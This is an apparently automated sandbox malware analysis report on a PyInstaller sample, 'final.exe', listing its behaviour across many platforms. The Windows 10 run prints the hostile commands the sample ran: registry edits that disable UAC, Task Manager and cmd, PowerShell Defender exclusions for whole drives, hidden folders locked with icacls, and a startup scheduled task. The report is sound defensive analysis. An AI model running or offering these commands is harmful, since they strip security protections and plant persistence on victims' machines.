Malware Analysis Report

2025-03-15 03:42

Sample ID 250113-nmm9kaspgm
Target final.exe
SHA256 d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12
Tags
pyinstaller defense_evasion discovery evasion execution exploit impact persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Analysis Overview

score
10/10

SHA256

d765f74af0a7e3986616b3018fd6190bd389458dcd408f208cb34072ef4eef12

Threat Level: Known bad

The file final.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller defense_evasion discovery evasion execution exploit impact persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies Windows Defender Real-time Protection settings

Deletes shadow copies

Command and Scripting Interpreter: PowerShell

Disables RegEdit via registry modification

Drops file in Drivers directory

Disables Task Manager via registry modification

Possible privilege escalation attempt

Disables cmd.exe use via registry modification

Loads dropped DLL

Drops startup file

Modifies file permissions

Reads user/profile data of web browsers

Impair Defenses: Safe Mode Boot

Executes dropped EXE

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Looks up external IP address via web service

Hide Artifacts: Hidden Files and Directories

Enumerates processes with tasklist

Unsigned PE

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

System policy modification

Checks SCSI registry key(s)

Kills process with taskkill

Uses Task Scheduler COM API

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Modifies registry key

Interacts with shadow copies

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-01-13 11:31

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral14

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-armhf-20240611-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-mipsel-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x86-arm-20240624-en

Max time network

3s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-arm64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

debian9-mipsel-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.pyc

[/tmp/final.pyc cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:55

Platform

win7-20240903-en

Max time kernel

839s

Max time network

841s

Command Line

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2976 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29762\gevent-24.11.1.dist-info\INSTALLER

MD5 365c9bfeb7d89244f2ce01c1de44cb85
SHA1 d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256 ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512 d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1

C:\Users\Admin\AppData\Local\Temp\_MEI29762\python312.dll

MD5 3c388ce47c0d9117d2a50b3fa5ac981d
SHA1 038484ff7460d03d1d36c23f0de4874cbaea2c48
SHA256 c98ba3354a7d1f69bdca42560feec933ccba93afcc707391049a065e1079cddb
SHA512 e529c5c1c028be01e44a156cd0e7cad0a24b5f91e5d34697fafc395b63e37780dc0fac8f4c5d075ad8fe4bd15d62a250b818ff3d4ead1e281530a4c7e3ce6d35

Analysis: behavioral3

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x86-arm-20240624-en

Max time network

6s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:41

Platform

android-x64-20240624-en

Max time network

4s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-mipsbe-20240418-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

win7-20240903-en

Max time network

0s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

macos-20241106-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

android-x64-arm64-20240910-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

macos-20241101-en

Max time network

1s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

debian9-armhf-20240729-en

Max time kernel

0s

Command Line

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Signatures

N/A

Processes

/tmp/final.exe

[/tmp/final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:40

Platform

win10v2004-20241007-en

Max time kernel

0s

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

Country Destination Domain Proto
N/A 20.44.239.154:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2025-01-13 11:30

Reported

2025-01-13 11:55

Platform

win10v2004-20241007-en

Max time kernel

900s

Max time network

892s

Command Line

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SYSTEM32\reg.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\system32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\SYSTEM32\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\$Sys-Manager\systemservice92.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\$Sys-Manager\systemservice92.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systemservice92.exe C:\$Sys-Manager\systemservice92.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fpu874l6h9r6pypx.exe C:\Users\Admin\AppData\Local\Temp\final.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ffpxcvfkbk48llsu.exe C:\$Sys-Manager\systemservice92.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A

Impair Defenses: Safe Mode Boot

defense_evasion
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Minimal C:\$Sys-Manager\systemservice92.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File created C:\$Sys-Manager\desktop.ini C:\Users\Admin\AppData\Local\Temp\final.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Hide Artifacts: Hidden Files and Directories

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\netsh.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\$Sys-Manager\systemservice92.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\final.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\$Sys-Manager\systemservice92.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2384 wrote to memory of 1600 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Users\Admin\AppData\Local\Temp\final.exe
PID 1600 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 224 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\SYSTEM32\schtasks.exe
PID 2512 wrote to memory of 2148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3916 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 224 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1060 wrote to memory of 3884 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1600 wrote to memory of 3452 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 3452 wrote to memory of 4456 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 592 wrote to memory of 5032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 2900 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 1600 wrote to memory of 4876 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 1600 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2260 wrote to memory of 4860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1600 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4876 wrote to memory of 4848 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 2848 wrote to memory of 3704 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1600 wrote to memory of 2060 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 592 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\$Sys-Manager\systemservice92.exe
PID 592 wrote to memory of 3056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2060 wrote to memory of 1588 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1600 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 2104 wrote to memory of 3952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\icacls.exe
PID 1600 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\final.exe C:\Windows\system32\cmd.exe
PID 4588 wrote to memory of 3724 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 592 wrote to memory of 1636 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 592 wrote to memory of 2640 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 592 wrote to memory of 2236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoStore = "1" C:\$Sys-Manager\systemservice92.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Users\Admin\AppData\Local\Temp\final.exe

C:\Users\Admin\AppData\Local\Temp\final.exe cmd /c %SIGILL% "SIGTERM|DELETE|SIGKILL"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice92.exe""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\systemservice.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager""

C:\Windows\SYSTEM32\schtasks.exe

schtasks /create /tn servicebat /tr C:\$Sys-Manager\systemservice.bat /sc onstart /f

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager"

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\systemservice.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\tasklist.exe

tasklist /FI "IMAGENAME eq systemservice92.exe"

C:\Windows\system32\find.exe

find /I "systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"

C:\Windows\system32\reg.exe

reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-1-0:(D)

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)"

C:\Windows\system32\timeout.exe

timeout /t 1

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-544:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)"

C:\Windows\system32\icacls.exe

icacls "C:\$Sys-Manager" /deny *S-1-5-32-545:(D)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "attrib +h "C:\$Sys-Manager\desktop.ini""

C:\Windows\system32\attrib.exe

attrib +h "C:\$Sys-Manager\desktop.ini"

C:\$Sys-Manager\systemservice92.exe

"C:\$Sys-Manager\systemservice92.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /f"

C:\Windows\SYSTEM32\reg.exe

reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"

C:\Windows\SYSTEM32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.exe'"

C:\Windows\SYSTEM32\netsh.exe

netsh wlan show profiles

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.bat'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath '.py'"

C:\Windows\system32\cmd.exe

